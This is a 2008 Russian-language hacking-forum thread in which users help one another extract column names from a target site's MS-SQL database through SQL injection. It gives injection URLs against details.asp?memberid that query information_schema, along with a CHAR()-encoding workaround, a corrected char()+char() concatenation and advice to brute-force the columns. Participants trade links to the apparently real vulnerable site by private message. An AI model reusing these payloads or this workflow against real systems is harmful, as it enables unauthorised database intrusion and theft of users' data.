Получение колонок через MS-SQL injection.

Discussion in 'Песочница' started by Dima-k17, 6 Oct 2008.

  1. Dima-k17

    Dima-k17 Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    29
    Likes Received:
    19
    Reputations:
    20
    Всем здрасте!=)
    При банальном запросе вида:
    http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name='a_users')--
    Получил ошибку, следующего содержания:
    Code:
    Microsoft OLE DB Provider for SQL Server error '80040e14' 
    
    Joined tables cannot be specified in a query containing outer join operators. View or function 'information_schema.columns' contains joined tables. 
    
    /details.asp, line 59
    
    Вопрос, реально ли в этой ситуации выдернуть имена столбцов, или придется перебирать? И если реально - то как это сделать?
     
    1 person likes this.
  2. ~!DoK_tOR!~

    ~!DoK_tOR!~ Banned

    Joined:
    10 Nov 2006
    Messages:
    673
    Likes Received:
    357
    Reputations:
    44
    Code:
    http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+column_name+FROM+information_schema.columns+where+table_name=CHAR(97,95,117,115,101,114,115))--
    
     
  3. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Вот так делать не надо, будет ошибка :
    The char function requires 1 arguments.

    Если уж char , то вот так : char(97)%2Bchar(95)%2Bchar(117)%2Bchar(115)%2Bchar(101)%2Bchar(114)%2Bchar(115)

    Но ИМХО дело не в этом, ошибка какая-то не та. Если не то, давай линк, а то гадания опять на три страницы будут :)
     
    1 person likes this.
  4. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    колонки придется брутить, jokester inurl:details.asp?memberid=244247 только 1 линк)
    мда.......
     
    1 person likes this.
  5. Dima-k17

    Dima-k17 Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    29
    Likes Received:
    19
    Reputations:
    20
    jokester, l1ght - линк в ПМ.
    А доктору и гисти по минусу бы поставить:-D
     
    #5 Dima-k17, 6 Oct 2008
    Last edited: 6 Oct 2008
  6. Dima-k17

    Dima-k17 Elder - Старейшина

    Joined:
    15 Sep 2005
    Messages:
    29
    Likes Received:
    19
    Reputations:
    20
    Проблема решилась много проще=) все 97 столбцов оказались числовыми....